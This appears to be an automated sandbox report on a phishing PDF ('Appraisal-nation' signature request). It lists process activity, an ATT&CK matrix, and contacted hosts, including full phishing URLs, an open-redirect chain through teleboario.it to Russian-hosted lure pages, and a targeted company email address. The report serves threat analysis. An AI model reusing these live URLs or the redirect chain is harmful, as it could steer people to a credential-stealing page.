Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal52.phis.winPDF@36/143@49/18
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6880Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-09 11-17-50-481.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Appraisal-nation-Review_and_Signature_Request46074.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1612,i,11819385348034914370,10990972197126798505,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2440,i,14667198300048541513,3180845413884203349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1612,i,11819385348034914370,10990972197126798505,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2440,i,14667198300048541513,3180845413884203349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Appraisal-nation-Review_and_Signature_Request46074.pdfInitial sample: PDF keyword /JS count = 0
Source: Appraisal-nation-Review_and_Signature_Request46074.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: Appraisal-nation-Review_and_Signature_Request46074.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://plasticoscorrea.com.br/favicon.ico0%Avira URL Cloudsafe
https://plasticoscorrea.com.br/script/disk/longbow.slidercaptcha.js0%Avira URL Cloudsafe
https://nokixa.qemitorn.ru/yz8E/0%Avira URL Cloudsafe
https://plasticoscorrea.com.br/script/0%Avira URL Cloudsafe
https://nokixa.qemitorn.ru/favicon.ico0%Avira URL Cloudsafe
https://plasticoscorrea.com.br/script/sliderFail.php0%Avira URL Cloudsafe
https://plasticoscorrea.com.br/script/disk/slidercaptcha.css0%Avira URL Cloudsafe
https://fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru/XKjHZhHbfYmhpubsmCuWquMukLoqwWivhWWUUTDVQBBOGTVVEMNKETMCNBQCXCWPVJHFKSPUCKFSWACXRDK0%Avira URL Cloudsafe
https://plasticoscorrea.com.br/wp-content/uploads/2024/09/cropped-icone-32x32.png0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru
    104.21.48.1
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
        84.201.210.39
        truefalse
          high
          www.teleboario.it
          195.201.80.48
          truefalse
            unknown
            nokixa.qemitorn.ru
            104.21.58.174
            truetrue
              unknown
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
                high
                code.jquery.com
                151.101.130.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    high
                    s-part-0016.t-0009.fb-t-msedge.net
                    13.107.253.44
                    truefalse
                      high
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        high
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          high
                          plasticoscorrea.com.br
                          162.241.203.181
                          truefalse
                            high
                            www.google.com
                            216.58.212.132
                            truefalse
                              high
                              picsum.photos
                              172.67.74.163
                              truefalse
                                high
                                www.office.com
                                unknown
                                unknownfalse
                                  high
                                  x1.i.lencr.org
                                  unknown
                                  unknownfalse
                                    high
                                    aadcdn.msftauth.net
                                    unknown
                                    unknownfalse
                                      high
                                      use.fontawesome.com
                                      unknown
                                      unknownfalse
                                        high
                                        identity.nel.measure.office.net
                                        unknown
                                        unknownfalse
                                          high
                                          login.microsoftonline.com
                                          unknown
                                          unknownfalse
                                            high
                                            fastly.picsum.photos
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              https://plasticoscorrea.com.br/script/disk/longbow.slidercaptcha.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://plasticoscorrea.com.br/script/sliderFail.phpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                high
                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                  high
                                                  https://plasticoscorrea.com.br/script/disk/slidercaptcha.cssfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ff5be739bf042ad/1736439515900/ET6ut0jnLrQZaS9false
                                                    high
                                                    https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                      high
                                                      https://nokixa.qemitorn.ru/yz8E/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://plasticoscorrea.com.br/script/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru/XKjHZhHbfYmhpubsmCuWquMukLoqwWivhWWUUTDVQBBOGTVVEMNKETMCNBQCXCWPVJHFKSPUCKFSWACXRDKfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/false
                                                        high
                                                        https://nokixa.qemitorn.ru/yz8E/#Dclientrelations@appraisal-nation.comfalse
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                            high
                                                            https://picsum.photos/280/155/?image=3false
                                                              high
                                                              https://plasticoscorrea.com.br/favicon.icofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://picsum.photos/280/155/?image=13false
                                                                high
                                                                https://nokixa.qemitorn.ru/favicon.icofalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ff5be739bf042ad/1736439515896/e1dd5f50336968dc9321d58ea4a711682e2132ee2edae4130f32588e70809f9c/L7iIotAeMgj8B4Lfalse
                                                                  high
                                                                  https://plasticoscorrea.com.br/wp-content/uploads/2024/09/cropped-icone-32x32.pngfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff5be739bf042ad&lang=autofalse
                                                                    high
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vrfalse
                                                                      high
                                                                      https://a.nel.cloudflare.com/report/v4?s=s%2Fl3Y%2Fbp5Cw%2BuuxMrGPbPKsbDSCs%2BGRxG0MfdceJDPz%2BKZscdduUOMQQgynlO9sp%2FOxrD9JZb64R9rWW8tEbyAL0zeFBbG3cJ4BESe6gkARgqStl17cDN%2FfQkcU1Dw%3D%3Dfalse
                                                                        high
                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                                                          high
                                                                          https://picsum.photos/chromecache_217.6.dr, chromecache_240.6.drfalse
                                                                            high
                                                                            https://login.windows-ppe.netchromecache_201.6.dr, chromecache_212.6.drfalse
                                                                              high
                                                                              https://fontawesome.com/license/freechromecache_244.6.drfalse
                                                                                high
                                                                                https://fontawesome.comchromecache_244.6.drfalse
                                                                                  high
                                                                                  https://login.microsoftonline.comchromecache_201.6.dr, chromecache_212.6.drfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    104.21.48.1
                                                                                    fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ruUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    162.241.203.181
                                                                                    plasticoscorrea.com.brUnited States
                                                                                    26337OIS1USfalse
                                                                                    104.18.94.41
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    151.101.130.137
                                                                                    code.jquery.comUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    104.21.96.1
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    151.101.194.137
                                                                                    unknownUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    35.190.80.1
                                                                                    a.nel.cloudflare.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    172.67.74.163
                                                                                    picsum.photosUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    195.201.80.48
                                                                                    www.teleboario.itGermany
                                                                                    24940HETZNER-ASDEfalse
                                                                                    104.17.24.14
                                                                                    cdnjs.cloudflare.comUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    104.21.58.174
                                                                                    nokixa.qemitorn.ruUnited States
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    216.58.212.132
                                                                                    www.google.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    104.18.95.41
                                                                                    challenges.cloudflare.comUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    239.255.255.250
                                                                                    unknownReserved
                                                                                    unknownunknownfalse
                                                                                    104.17.25.14
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    IP
                                                                                    192.168.2.17
                                                                                    192.168.2.18
                                                                                    192.168.2.5
                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                    Analysis ID:1586844
                                                                                    Start date and time:2025-01-09 17:17:13 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 4m 39s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:20
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Appraisal-nation-Review_and_Signature_Request46074.pdf
                                                                                    Detection:MAL
                                                                                    Classification:mal52.phis.winPDF@36/143@49/18
                                                                                    EGA Information:Failed
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 0
                                                                                    • Number of non-executed functions: 0
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .pdf
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.185.142, 64.233.167.84, 23.56.252.213, 172.217.18.110, 18.213.11.84, 34.237.241.83, 54.224.241.105, 50.16.47.176, 172.217.18.14, 104.21.27.152, 172.67.142.245, 162.159.61.3, 172.64.41.3, 151.101.129.91, 151.101.193.91, 151.101.1.91, 151.101.65.91, 142.250.181.238, 192.229.221.95, 2.16.168.107, 2.16.168.105, 23.209.209.135, 2.22.50.131, 2.22.50.144, 142.250.185.206, 172.217.16.206, 142.250.185.238, 216.58.206.78, 142.250.185.99, 142.250.186.46, 20.190.159.0, 40.126.31.73, 20.190.159.73, 40.126.31.71, 20.190.159.75, 20.190.159.71, 20.190.159.4, 20.190.159.64, 13.107.6.156, 20.190.159.68, 20.190.159.2, 40.126.31.69, 40.126.32.68, 20.190.160.14, 40.126.32.136, 40.126.32.138, 40.126.32.134, 20.190.160.20, 20.190.160.17, 40.126.32.133, 142.250.186.42, 216.58.206.74, 142.250.185.170, 142.250.184.234, 142.250.186.106, 142.250.185.74, 142.250.186.74, 142.250.185.202, 172.217.16.202, 142.250.181.234, 142.250.186.170, 142.250.186.138, 142.250.185.234, 172.2
                                                                                    • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, a767.dspw65.akamai.net, ak.privatelink.msidentity.com, acroipm2.adobe.com, onedscolprdfrc03.francecentral.cloudapp.azure.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, fs.microsoft.com, content-autofill.googleapis.com, acroipm2.adobe.com.edgesuite.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, aadcdn.msauth.net, eu.events.data.trafficmanager.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, geo2.adobe.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.microsoft.com, e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, home-office365-com.b-0004.b-msedge.net, a1894.dscb.ak
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: Appraisal-nation-Review_and_Signature_Request46074.pdf
                                                                                    TimeTypeDescription
                                                                                    11:18:00API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                    SourceURL
